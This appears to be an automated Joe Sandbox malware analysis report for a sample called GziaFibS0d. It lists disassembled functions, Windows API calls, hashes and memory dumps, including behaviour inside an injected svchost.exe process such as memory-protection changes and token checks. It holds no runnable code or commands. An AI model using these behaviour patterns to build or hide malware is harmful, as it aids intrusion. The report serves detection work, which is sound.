Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC0 Relevance: 3.1, APIs: 2, Instructions: 66libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 00401B1F
GetProcAddress.KERNEL32(00000000,00000001), ref: 00401B3E

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 4030064fb0e964afdcf23972233fc9c9be3b5c6a7fa54d01061244f531e94f61
Instruction ID: cdf75ee96e393b13d772fe970b3b5d092bcd5554fe9ca3f0f57d124b42870933
Opcode Fuzzy Hash: 4030064fb0e964afdcf23972233fc9c9be3b5c6a7fa54d01061244f531e94f61
Instruction Fuzzy Hash: 6511B4355052554BDB329F3888007A77BF8AB5A340F1401BADCC6F3360E774A9428BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407DAC Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

k<F=, xrefs: 00407E5E

Memory Dump Source

Source File: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID:
String ID: k<F=
API String ID: 0-509155192
Opcode ID: a2e966b2fabd568d97c04b2b57bb96fa85763e160ec39826bc8a2c7ef8a71785
Instruction ID: 1d64187a118c3292aa812c44e529dd9285692a3e65d91ec1eb5fdb23479d4816
Opcode Fuzzy Hash: a2e966b2fabd568d97c04b2b57bb96fa85763e160ec39826bc8a2c7ef8a71785
Instruction Fuzzy Hash: AF51E62584E3C1AFDB635B3888550837FB16E1331439A54EBC0C09F5A3D625584BD797

Uniqueness

Uniqueness Score: -1.00%

Function 00407CB5 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6f3114210e9b7289c5825decebd15677ab7be6fe350c4e9436833a6adc9a52
Instruction ID: 2f5f6b2cde38f10ace780609c1330b86a95d17e0417fbdc0340e0ca67fac887a
Opcode Fuzzy Hash: ef6f3114210e9b7289c5825decebd15677ab7be6fe350c4e9436833a6adc9a52
Instruction Fuzzy Hash: 252127314583D25FD7629F3488656C3BFA5AF4B31139A46EBC4808F0A3D7259007D782

Uniqueness

Uniqueness Score: -1.00%

Function 004D00C6 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1024655906.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_GziaFibS0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
Instruction ID: 06e3b529f2f1a72ba8422f2b7bbb0bd686f6e16eae9b7a69a69ffc0bc34d6e11
Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
Instruction Fuzzy Hash: 1D1172733401009FD754DE55DC91FA6B3A9EB89330B29805BED04CB315D67AE841C660

Uniqueness

Uniqueness Score: -1.00%

Function 00421D24 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1024531625.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_GziaFibS0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
Instruction ID: 557d18d3c8d8a000755e4f1ab01b6a003814957f7f9fccbe469879d5a63c07ac
Opcode Fuzzy Hash: 538cd7daa44cb0be5c709bed46d95b701850ced07307e9b00aac71a02e345600
Instruction Fuzzy Hash: A1117F733501109FD754DE55EC81EA2B39AEBA83207698166ED04CB325E67AEC42C764

Uniqueness

Uniqueness Score: -1.00%

Function 00407ED8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b826da8e6317692a4f5689804cf4f4126f950813e2a8dd9c9d91d10fa1db0667
Instruction ID: 87c4afea6a8a3ea4cdc7e4b7fd8280be57f8930d1defd3db24446f27a475f934
Opcode Fuzzy Hash: b826da8e6317692a4f5689804cf4f4126f950813e2a8dd9c9d91d10fa1db0667
Instruction Fuzzy Hash: 7CC09220228326BD2FE8F9B548064C3B3C23703B04782B021C602AB862DEB54A87F104

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916

Strings

uTD, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000000.00000002.1024531625.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_GziaFibS0d.jbxd

Similarity

API ID: DirectoryWindows__aulldiv
String ID: uTD
API String ID: 2557273154-35483248
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1024301226.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024337010.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024363578.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1024387310.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_GziaFibS0d.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 6232, Parent PID: 7020COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6%
Total number of Nodes:	636
Total number of Limit Nodes:	9

Executed Functions

Function 025326ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02532709
RtlGetVersion.NTDLL(?), ref: 0253271E

Part of subcall function 02533641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02532790), ref: 02533659

Strings

f<v, xrefs: 025327BD

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: c320be4bccd849deaa461e8309b6de1fa409946edf8c06bf59ee40ee5a0f2b5b
Instruction ID: d884e14e28ed5bbe7cd3261d572d2afe0028a16e5491102f4b91039f41a3af2e
Opcode Fuzzy Hash: c320be4bccd849deaa461e8309b6de1fa409946edf8c06bf59ee40ee5a0f2b5b
Instruction Fuzzy Hash: FC21C835C842AC7ED7129FB4A8016D67FACBB56300F0538DDE96493302D124892CEBBD

Uniqueness

Uniqueness Score: -1.00%

Function 02532833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02532858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0253287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 025328A3

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: ed746ff95c00afff43a1ec5cd465d4fd9d14c5554444513de677be9a82ebad96
Instruction ID: e23f4d870ebd9de7831ec00aa8d15b0efdfbf5e7edfa356cade4611054079d9c
Opcode Fuzzy Hash: ed746ff95c00afff43a1ec5cd465d4fd9d14c5554444513de677be9a82ebad96
Instruction Fuzzy Hash: 81214C76940248AFCB25CF25E8849DA7BACFB09214F01151AFC15D3242DB30D91ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 02532BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02532BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02532C23

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4b9d7102c90ee02a12c11d29a8be374967cdf2acdc21da073a193f7370e3e62e
Instruction ID: 2cf0df872343d0bbd5b8ca9595c3ecec9bcb3fcbdbe923957d8691abab328590
Opcode Fuzzy Hash: 4b9d7102c90ee02a12c11d29a8be374967cdf2acdc21da073a193f7370e3e62e
Instruction Fuzzy Hash: F9119435910106BFCB09CF98C894EE97BB8FF48324F1552ADE9258F291DB31AE45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0253338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 025333BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 025333E0
GetLastError.KERNEL32 ref: 025333E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02533401
RtlAllocateHeap.NTDLL(00000000), ref: 02533408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02533428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02533448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 0253346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02533480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02533497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0253351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02533527
HeapFree.KERNEL32(00000000), ref: 0253352E

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: cae10dbb7c4a351d137cec8f427633f399f263f1cded92c3a54f0fb84cac8402
Instruction ID: ad0b15e47e71fcd6d9da9b06dcdbb0d5c7f32419db4867a4779841a267314fc1
Opcode Fuzzy Hash: cae10dbb7c4a351d137cec8f427633f399f263f1cded92c3a54f0fb84cac8402
Instruction Fuzzy Hash: 9251AE72944301AFD7138F28C849B6ABFE4FB4A324F186988F48483261D731D948DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02533555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02533570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02533585
GetLastError.KERNEL32 ref: 0253358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 025335A1
RtlAllocateHeap.NTDLL(00000000), ref: 025335A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 025335C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 025335CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 025335F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 025335FD
HeapFree.KERNEL32(00000000), ref: 02533604

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: c2b2c675e8b45880a7397c7b4d7a204f5d4472fe3696da5f82045e4fba96f9e0
Instruction ID: 95f8420c4718d192e56cead414e018e9368eeb702dde11c5f4f7200106e031e1
Opcode Fuzzy Hash: c2b2c675e8b45880a7397c7b4d7a204f5d4472fe3696da5f82045e4fba96f9e0
Instruction Fuzzy Hash: 7F214C72D40208BBEB328F95DC09BAEBF78FB45756F141594F50196190C7328E58EAA8

Uniqueness

Uniqueness Score: -1.00%

Function 02532DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,025351B9,?,025370E8,00000000,00000000,?), ref: 02532DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,025351B9,?,025370E8,00000000,00000000,?,00000000), ref: 02532DDC
CloseHandle.KERNEL32(00000000,?,025351B9,?,025370E8,00000000,00000000,?,00000000), ref: 02532E4D

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 7754b663dfd55098dd7d03d1d9036c1aac61d841771761126634e2dabd0c62cb
Instruction ID: c2189607c697c15ce6a6ae84fbcc9ff24642b989e8262b6d7e83713cd19332f1
Opcode Fuzzy Hash: 7754b663dfd55098dd7d03d1d9036c1aac61d841771761126634e2dabd0c62cb
Instruction Fuzzy Hash: 8F1181B1944621AFD7224F60DC49B7BBFA8FB4E661F005919FE42D6240C730C915EB79

Uniqueness

Uniqueness Score: -1.00%

Function 02534068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,0253373D,?,00100000,00000006,?), ref: 0253406D
RtlAllocateHeap.NTDLL(00000000,?,0253373D), ref: 02534074
CreateFileMappingW.KERNELBASE(000000FF,025362B8,00000004,00000000,?,?,?,?,?,0253373D,?,00100000,00000006,?), ref: 0253409B
GetLastError.KERNEL32(?,?,?,0253373D,?,00100000,00000006,?), ref: 025340A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,0253373D,?,00100000,00000006,?), ref: 025340C6
CloseHandle.KERNEL32(00000000,?,?,?,0253373D,?,00100000,00000006,?), ref: 025340D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0253373D,?,00100000,00000006,?), ref: 025340DE
HeapFree.KERNEL32(00000000,?,?,?,0253373D,?,00100000,00000006,?), ref: 025340E5

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: bd796cd38298026f21c61efccee86e13f26ea3f3d2cffb4c410afccb33c17844
Instruction ID: 8ad37d4fb3c7ec9570011bc2dc726cbb02205c1443e4bb666ac4f59f7213f2e7
Opcode Fuzzy Hash: bd796cd38298026f21c61efccee86e13f26ea3f3d2cffb4c410afccb33c17844
Instruction Fuzzy Hash: 941160B5A84706AFD7218F64EC48F26BBE8FF0C715F019818FA55DB291D730D8149B28

Uniqueness

Uniqueness Score: -1.00%

Function 02531FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02531FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02532009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02532014
CloseHandle.KERNEL32 ref: 02532025

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 12fa35538fa1ca90da08a5ac50f8cfa1c0a3720e38cbddc6de4c5ebc0ef471e5
Instruction ID: 4ff570e5878e9cb1754533cd000a39ffbde36d8eb6cb76c305999f676f33d35f
Opcode Fuzzy Hash: 12fa35538fa1ca90da08a5ac50f8cfa1c0a3720e38cbddc6de4c5ebc0ef471e5
Instruction Fuzzy Hash: E1E0E571D825317A96222E36BC0D9E76E9DEF0A2A53016815B809C0208D6308819E9FC

Uniqueness

Uniqueness Score: -1.00%

Function 0253492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,025370E8), ref: 02534982
HeapFree.KERNEL32(00000000,?,00000000,00000000,025370E8), ref: 02534989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,025370E8), ref: 025349B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,025370E8), ref: 025349B8

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 4ce5041aafda1ba5e06bf1c8389ac7319d0d04393bc3d1a812ce06105dbea3e7
Instruction ID: b8ebe370ba78ee2209e260859eb7d4c564cd063e1342db3d222cee1fb65486fa
Opcode Fuzzy Hash: 4ce5041aafda1ba5e06bf1c8389ac7319d0d04393bc3d1a812ce06105dbea3e7
Instruction Fuzzy Hash: F811C1B7D44208BBDB12DEA4D804BEEFBBCFB48305F046599ED44D6240E73196189BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02532C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(025363B4,?), ref: 02532C67

Part of subcall function 025355BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 025355D3
Part of subcall function 025355BC: CreateDirectoryW.KERNELBASE(?,025362B8), ref: 0253561C

Part of subcall function 02532D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02532D86
Part of subcall function 02532D40: RtlFreeHeap.NTDLL(00000000), ref: 02532D8D

lstrcpyW.KERNEL32(025363B4,?), ref: 02532CC7
lstrcatW.KERNEL32(?,0253738C), ref: 02532CD9

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: 3dae6bccf84e96f8793060475be0cfcf57ccc2415be58abda18f2703a0a89bba
Instruction ID: 1b8f4775c711287d2fb417d28d54ad7e3bd1f4235db6a9e8f1ac032e544a2678
Opcode Fuzzy Hash: 3dae6bccf84e96f8793060475be0cfcf57ccc2415be58abda18f2703a0a89bba
Instruction Fuzzy Hash: C621ECB294020DAFDB11DFA4DC49BDA77BCBB08304F40246AF909D7251EB309A58CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02535108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 025354AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 025354C0
Part of subcall function 025354AC: CreateDirectoryW.KERNELBASE(00000000,025362B8), ref: 02535500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0253513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0253515E
CloseHandle.KERNEL32(00000000), ref: 02535167

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 398daa9e82673e46a733db500f5fc845ae253a4effa0d0dc8a78b22e53d93bbb
Instruction ID: c4e124c3c5b72f99d4a7d71a6d33700bab7eff55f60085f38755411c422b2fd7
Opcode Fuzzy Hash: 398daa9e82673e46a733db500f5fc845ae253a4effa0d0dc8a78b22e53d93bbb
Instruction Fuzzy Hash: E6012B729443087FD2325E70EC48F6BBB9CF78D764F516E29FA91C2180F33155048669

Uniqueness

Uniqueness Score: -1.00%

Function 02532EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02532D76,?,?,?,?), ref: 02532ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02532D76,?,?,?,?,?), ref: 02532EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02532D76,?,?,?,?,?), ref: 02532EFD

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 0e094f93c90668f134951e90b2eebdd1ecb8ff863c9e76c0a61401e9410c2bbd
Instruction ID: 7df38580e30ab3d4b8363be6481e896f96f53a9c454cfc462b150030479b308f
Opcode Fuzzy Hash: 0e094f93c90668f134951e90b2eebdd1ecb8ff863c9e76c0a61401e9410c2bbd
Instruction Fuzzy Hash: 47F0C272945518BBDB215D62AC49FABBF6CFB49AB4F000A21FD05D3180D3305D009AF4

Uniqueness

Uniqueness Score: -1.00%

Function 02532D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02532DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,025351B9,?,025370E8,00000000,00000000,?), ref: 02532DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02532DA5

Part of subcall function 02532EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02532D76,?,?,?,?), ref: 02532ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02532D86
RtlFreeHeap.NTDLL(00000000), ref: 02532D8D

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 5b4eeb480fe14275424d6b2a786e2550a19729af44916464c7d68902b31f87e6
Instruction ID: 20175f23b195520428f352a2db825b84eef7b0c5d858345969435a16d5055b42
Opcode Fuzzy Hash: 5b4eeb480fe14275424d6b2a786e2550a19729af44916464c7d68902b31f87e6
Instruction Fuzzy Hash: 5A01E876C40118BBCF12AFA0DC05AADBF7AEB08751F0459A1FD09A5160D7328E65AB94

Uniqueness

Uniqueness Score: -1.00%

Function 02532674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02532679

Part of subcall function 02532973: lstrcpyW.KERNEL32(025362F2,025363B4), ref: 0253298C
Part of subcall function 02532973: lstrcatW.KERNEL32(025362F0,02537338), ref: 0253299C
Part of subcall function 02532973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 025329A7

Part of subcall function 025326ED: memset.MSVCRT ref: 02532709
Part of subcall function 025326ED: RtlGetVersion.NTDLL(?), ref: 0253271E

Part of subcall function 02533555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02533570
